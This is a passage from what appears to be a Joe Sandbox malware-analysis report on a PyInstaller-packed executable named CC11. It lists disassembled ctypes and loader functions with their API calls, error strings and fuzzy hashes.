Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction ID: 582e2f5395253aec387d1e83e57f5de326240f7cfe8f1735a6deca2948ca138d
Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction Fuzzy Hash: 9141A511B09A4660FAB1EB75A9556F92361EF897C8F8000B1EE1DC77DEEE3CE5818340

Function 00007FF8BFB7E050 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_UnpackTuple.PYTHON38 ref: 00007FF8BFB7E084
PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB7E09A
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7E0A9
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7E0C9
PyErr_Format.PYTHON38 ref: 00007FF8BFB7E0F1

Strings

byref() argument must be a ctypes instance, not '%s', xrefs: 00007FF8BFB7E0D8
byref, xrefs: 00007FF8BFB7E072

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Arg_FormatNumber_OccurredSsize_tSubtypeTupleType_Unpack
String ID: byref$byref() argument must be a ctypes instance, not '%s'
API String ID: 3717719007-1446499295
Opcode ID: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
Instruction ID: 16d43837195dacf5edf2a0d808a9880089ed45eeb75a51817458e60444b7074c
Opcode Fuzzy Hash: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
Instruction Fuzzy Hash: 2A213426A09A4681EB00CBA9E8506B877A0FF88BE4F044636CB6E87791DF7DE554C301

Function 00007FF8BFB7BAD4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51stringCOMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,00000000,00007FF8BFB77816), ref: 00007FF8BFB7BAF8
PyType_IsSubtype.PYTHON38(?,?,00000000,00007FF8BFB77816), ref: 00007FF8BFB7BB16
PyUnicode_AsUTF8.PYTHON38(?,?,00000000,00007FF8BFB77816), ref: 00007FF8BFB7BB41
strchr.VCRUNTIME140(?,?,00000000,00007FF8BFB77816), ref: 00007FF8BFB7BB51
PyErr_Format.PYTHON38(?,?,00000000,00007FF8BFB77816), ref: 00007FF8BFB7BB87

Strings

PzZ, xrefs: 00007FF8BFB7BB47
'out' parameter %d must be a pointer type, not %s, xrefs: 00007FF8BFB7BB7A

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: SubtypeType_$Err_FormatUnicode_strchr
String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
API String ID: 3227297879-2360062653
Opcode ID: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
Instruction ID: 043a6a045711c4e389593e92973763f62059c7bfa9f88de0d5bf61eebb494014
Opcode Fuzzy Hash: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
Instruction Fuzzy Hash: 94212925B09A46D5EB149F99E44127827A1FFC4FC8F088031DF4E873AADE2CE885C740

Function 00007FF8BFB7C688 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49stringCOMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB7C581), ref: 00007FF8BFB7C6A5
PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB7C581), ref: 00007FF8BFB7C6C3
PyUnicode_AsUTF8.PYTHON38 ref: 00007FF8BFB7C6F3
strchr.VCRUNTIME140 ref: 00007FF8BFB7C703
PyErr_Format.PYTHON38 ref: 00007FF8BFB7C737

Strings

sPzUZXO, xrefs: 00007FF8BFB7C6F9
cast() argument 2 must be a pointer type, not %s, xrefs: 00007FF8BFB7C72D

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: SubtypeType_$Err_FormatUnicode_strchr
String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
API String ID: 3227297879-1038790478
Opcode ID: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
Instruction ID: 5963908313302226d692856038e902f4be350d0e05f486ff6b0442196b1be6a6
Opcode Fuzzy Hash: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
Instruction Fuzzy Hash: 0F2121A5B0964792EF549F9DD4503B82760EF94FC5F68403ACB4D47261DF2CE984C350

Function 00007FF8BFB8001C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON38 ref: 00007FF8BFB80052
PyUnicode_AsWideChar.PYTHON38 ref: 00007FF8BFB8006D
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB80082
PyErr_SetString.PYTHON38 ref: 00007FF8BFB80099
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB800B2

Strings

one character unicode string expected, xrefs: 00007FF8BFB8008F
unicode string expected instead of %s instance, xrefs: 00007FF8BFB80044

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: DeallocErr_$CharFormatStringUnicode_Wide
String ID: one character unicode string expected$unicode string expected instead of %s instance
API String ID: 3624372013-2255738861
Opcode ID: 78dfc2eb6af70e9ff56f0b870839ae75e7c80da9051f64390c1f4690cb9272f4
Instruction ID: 3337bd6fea6e253b1a1bcc8fe6869907a73378189b8b11ca215b042f90d16ddb
Opcode Fuzzy Hash: 78dfc2eb6af70e9ff56f0b870839ae75e7c80da9051f64390c1f4690cb9272f4
Instruction Fuzzy Hash: 5511E675A19B4AC1EB449FAEE8541B82360FBC9BE4F549032DB4E4776ADE2DD488C301

Function 00007FF8BFB7E378 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON38 ref: 00007FF8BFB7E397
GetLastError.KERNEL32 ref: 00007FF8BFB7E3AD
PyUnicode_FromWideChar.PYTHON38 ref: 00007FF8BFB7E3D6
LocalFree.KERNEL32 ref: 00007FF8BFB7E3E2

Strings

<no description>, xrefs: 00007FF8BFB7E3EA
|i:FormatError, xrefs: 00007FF8BFB7E38C

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
String ID: <no description>$|i:FormatError
API String ID: 935104296-1632374824
Opcode ID: 76526e8ca7a5dbad8a9db4044e1930993c468c73b951a0b1ccb6cf4ff79fcccc
Instruction ID: 9efa05082639b16bdb73f5359a727570e67ec3d0973e45f3d83b6abe6842b5b1
Opcode Fuzzy Hash: 76526e8ca7a5dbad8a9db4044e1930993c468c73b951a0b1ccb6cf4ff79fcccc
Instruction Fuzzy Hash: 7C018061B0D64282EB159BADE8040B927A1FF88BE0F154231DB6E836D5EF3CE444C700

Function 00007FF8BFB7E408 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON38 ref: 00007FF8BFB7E42D
PyEval_SaveThread.PYTHON38 ref: 00007FF8BFB7E43B
FreeLibrary.KERNEL32 ref: 00007FF8BFB7E449
PyEval_RestoreThread.PYTHON38 ref: 00007FF8BFB7E464
PyErr_SetFromWindowsErr.PYTHON38 ref: 00007FF8BFB7E470

Strings

O&:FreeLibrary, xrefs: 00007FF8BFB7E41F

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Eval_Thread$Arg_Err_FreeFromLibraryParseRestoreSaveTupleWindows
String ID: O&:FreeLibrary
API String ID: 204461231-2600264430
Opcode ID: 75aac2151fbe6049cb3e9a760563f3d4315885d4bc3b29649270f1793fab5e9a
Instruction ID: e16a0167d20c4bba0552a99a9c3050a3c9969e1644bdd3303f9688f303e8d0d0
Opcode Fuzzy Hash: 75aac2151fbe6049cb3e9a760563f3d4315885d4bc3b29649270f1793fab5e9a
Instruction Fuzzy Hash: C901D325A1DA4782EB548BEAEC401792760FF88BC0F544032DB4E53766DE3CE849C701

Function 00007FF8BFB749D0 Relevance: 12.1, APIs: 8, Instructions: 59COMMON

Download Yara Rule

APIs

PyMem_Free.PYTHON38 ref: 00007FF8BFB74A29
PyMem_Free.PYTHON38 ref: 00007FF8BFB74A36
PyMem_Free.PYTHON38 ref: 00007FF8BFB74A40
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB74A9B
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB74ABB
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7949A
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB794A6

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$FreeMem_
String ID:
API String ID: 2019857417-0
Opcode ID: 374871c9eff3e112a1b206d9784e4eccbf1f957899ebfee0265df15c18715757
Instruction ID: 59a1f547c7d16417148c5af4b4f10bb130bfefccc975963ca5939abf66d60fde
Opcode Fuzzy Hash: 374871c9eff3e112a1b206d9784e4eccbf1f957899ebfee0265df15c18715757
Instruction Fuzzy Hash: A531EA32A0AA42C5EB989FEAD8543BC37A4FB95FDAF244030CB4E46255DF3CA545D314

Function 00007FF8BFB73390 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

PyObject_CallObject.PYTHON38(00000000,00000000,00000000,00000001,00000001,00007FF8BFB77ED3), ref: 00007FF8BFB733C0
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7344B
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7853A
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB78549

Strings

has no _stginfo_, xrefs: 00007FF8BFB783C1, 00007FF8BFB78530

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: CallDeallocErr_ObjectObject_StringSubtypeType_
String ID: has no _stginfo_
API String ID: 1588466501-2912685656
Opcode ID: 5c1c4e8e87691ef5d94af4ab4c7f18db9f774f61d349d2447f707128ae63115f
Instruction ID: c10592551516eb0a6ec03e3e7964cac71ea8a008dd2ae1a07eef7f41358267c9
Opcode Fuzzy Hash: 5c1c4e8e87691ef5d94af4ab4c7f18db9f774f61d349d2447f707128ae63115f
Instruction Fuzzy Hash: D1B11D72B09B8285EB65CFAAE4502792BA4FB84BC4F184436DB4E47795DF3CE564C340

Function 00007FF69001CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D06D
GetLastError.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D0A5
FreeLibrary.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D113
GetProcAddress.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D11F

Strings

api-ms-, xrefs: 00007FF69001D08D

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: c14b94142e2d950d534a811ae49820a420fbbe260568b69c40cb5573b4195e73
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 8531B421A1AA42A1EE77DB66A4007752395FF0CBA8F590576EE1D87388EF7CE4428700

Function 00007FF8BFB7A5D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A5FF
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7A630
PyObject_IsInstance.PYTHON38 ref: 00007FF8BFB7A641
PyErr_Format.PYTHON38 ref: 00007FF8BFB7A671

Strings

Pointer does not support item deletion, xrefs: 00007FF8BFB7A5F5
expected %s instead of %s, xrefs: 00007FF8BFB7A654

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$FormatInstanceObject_StringSubtypeType_
String ID: Pointer does not support item deletion$expected %s instead of %s
API String ID: 1243598503-2046472288
Opcode ID: 7e5abba99994391ff7d7e0f3205b13952e94d9d845f4bbb21d1d68935d99630f
Instruction ID: 1501d2ce5df08537291a0e22cf6f5ced026b06e656f38cd4acd607e89cd65e21
Opcode Fuzzy Hash: 7e5abba99994391ff7d7e0f3205b13952e94d9d845f4bbb21d1d68935d99630f
Instruction Fuzzy Hash: 23215161A09B4285EB449FAAD8400BA6765FF89FD8B148532DF1E577A6DF3CE485C300

Function 00007FF690017B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
GetTokenInformation.ADVAPI32 ref: 00007FF690017BA8
GetLastError.KERNEL32 ref: 00007FF690017BB2
GetTokenInformation.ADVAPI32 ref: 00007FF690017BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
CloseHandle.KERNEL32 ref: 00007FF690017C26

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction ID: caaba141d6650ae7dd261c3e276eb61553160e369f13a72dacd188c2a5324921
Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction Fuzzy Hash: 5D217631A0CA4291EB709B75E48463AA3A1FFC57A8F500275EA6D83BDDDF7CD4858740

Function 00007FF69002A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69002A46F
FlsGetValue.KERNEL32 ref: 00007FF69002A484
FlsSetValue.KERNEL32 ref: 00007FF69002A4A5
FlsSetValue.KERNEL32 ref: 00007FF69002A4D2
FlsSetValue.KERNEL32 ref: 00007FF69002A4E3
FlsSetValue.KERNEL32 ref: 00007FF69002A4F4
SetLastError.KERNEL32 ref: 00007FF69002A50F

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction ID: 19388cbea8efa2374654c0aacefefa60c5212b1b5965c82967659b45a91bd2f7
Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction Fuzzy Hash: 73215E20B4C682A2FA78A339565957D6182EF897B0F1447B4E93EC7BDEDE6CF4024701

Function 00007FF6900129E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
MessageBoxW.USER32 ref: 00007FF690012ACF

Strings

Error, xrefs: 00007FF690012ABE
<FormatMessageW failed.>, xrefs: 00007FF690012A83
%ls%ls: %ls, xrefs: 00007FF690012A96

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction ID: f7e6f0c8486276df5c64299267a43f10cd3c0e44f38c4daa40fc890f1ce665e7
Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction Fuzzy Hash: 34212172618A85A2E7319B20F4506EA7365FB88788F400136EBCD93B9CDF7CD5468B40

Function 00007FF8BFB7F2AC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON38 ref: 00007FF8BFB7F2ED
PyUnicode_AsWideChar.PYTHON38 ref: 00007FF8BFB7F30D
PyErr_Format.PYTHON38 ref: 00007FF8BFB7F33A
PyUnicode_AsWideChar.PYTHON38 ref: 00007FF8BFB7F353

Strings

string too long (%zd, maximum length %zd), xrefs: 00007FF8BFB7F32D
unicode string expected instead of %s instance, xrefs: 00007FF8BFB7F2DF

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: CharErr_FormatUnicode_Wide
String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
API String ID: 2195588020-2061977717
Opcode ID: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
Instruction ID: c5fc009ec3f548c3894bbedc78328e5d77fd89fea6a8d2f9512da8bfb854b9a9
Opcode Fuzzy Hash: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
Instruction Fuzzy Hash: 5F119D64B09B4281EA40DB9AE8101B867A0FF88FE4B544232EF1E53BA5DF3CE485C340

Function 00007FF8BFB7BBEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC2D
PyErr_Occurred.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC3C
PyErr_Format.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC6D

Strings

required argument '%S' missing, xrefs: 00007FF8BFB7BC66
not enough arguments, xrefs: 00007FF8BFB7BC75

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Dict_ErrorFormatItemOccurredWith
String ID: not enough arguments$required argument '%S' missing
API String ID: 62204369-3448764933
Opcode ID: 67bdfaa597aee7b6c3e3d71308b9fb0a6ba40f0cfb4da4c07b98cbdf7840eb8d
Instruction ID: eaa1534b1e07c8d0d765c89284a9fea91da5c840330d349c807cd9ec8f76cbfa
Opcode Fuzzy Hash: 67bdfaa597aee7b6c3e3d71308b9fb0a6ba40f0cfb4da4c07b98cbdf7840eb8d
